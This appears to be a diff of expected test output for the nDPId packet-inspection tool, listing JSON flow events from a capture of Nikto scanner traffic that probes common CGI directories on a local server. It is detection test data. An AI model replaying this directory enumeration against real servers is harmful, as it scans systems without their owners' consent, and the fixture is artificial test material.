+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1576420276707,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276707,"pkt":"AAAAAAAAAAAAAAAACABFAADCUelAAEAG6kp\/AAABfwAAAcHIH5DIZGoAvjYJ64AYAED+tgAAAQEICp1m+wudZvsLR0VUIC9tcGNnaS8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQoNCg=="} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mpcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mpcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1576420276708,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276708,"pkt":"AAAAAAAAAAAAAAAACABFAADE7opAAEAGTad\/AAABfwAAAcHKH5CIytaS2kjlzYAYAED+uAAAAQEICp1m+wydZvsMR0VUIC9jZ2ktYmluLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1576420276710,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276710,"pkt":"AAAAAAAAAAAAAAAACABFAADEp+BAAEAGlFF\/AAABfwAAAcHMH5C4I5\/IUy7GWoAYAED+uAAAAQEICp1m+w6dZvsNR0VUIC9vd3MtYmluLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ows-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ows-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1576420276711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276711,"pkt":"AAAAAAAAAAAAAAAACABFAADEXJRAAEAG351\/AAABfwAAAcHOH5AWt2SMpHJk2oAYAED+uAAAAQEICp1m+w+dZvsPR0VUIC9jZ2ktc3lzLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-sys\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-sys\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1576420276713,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276713,"pkt":"AAAAAAAAAAAAAAAACABFAADG5r1AAEAGVXJ\/AAABfwAAAcHQH5DCed6iQK2\/KYAYAED+ugAAAQEICp1m+xCdZvsQR0VUIC9jZ2ktbG9jYWwvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1576420276714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276714,"pkt":"AAAAAAAAAAAAAAAACABFAADCR6dAAEAG9Ix\/AAABfwAAAcHSH5C\/OX\/AhojitYAYAED+tgAAAQEICp1m+xKdZvsSR0VUIC9odGJpbi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htbin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htbin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1576420276717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276717,"pkt":"AAAAAAAAAAAAAAAACABFAADD3hBAAEAGXiJ\/AAABfwAAAcHUH5AtGuYWzQuuvoAYAED+twAAAQEICp1m+xSdZvsUR0VUIC9jZ2liaW4vIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgibin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgibin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1576420276718,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276718,"pkt":"AAAAAAAAAAAAAAAACABFAADB4dFAAEAGWmN\/AAABfwAAAcHWH5B7V9nVmVXzCoAYAED+tQAAAQEICp1m+xadZvsWR0VUIC9jZ2lzLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCg0K"} 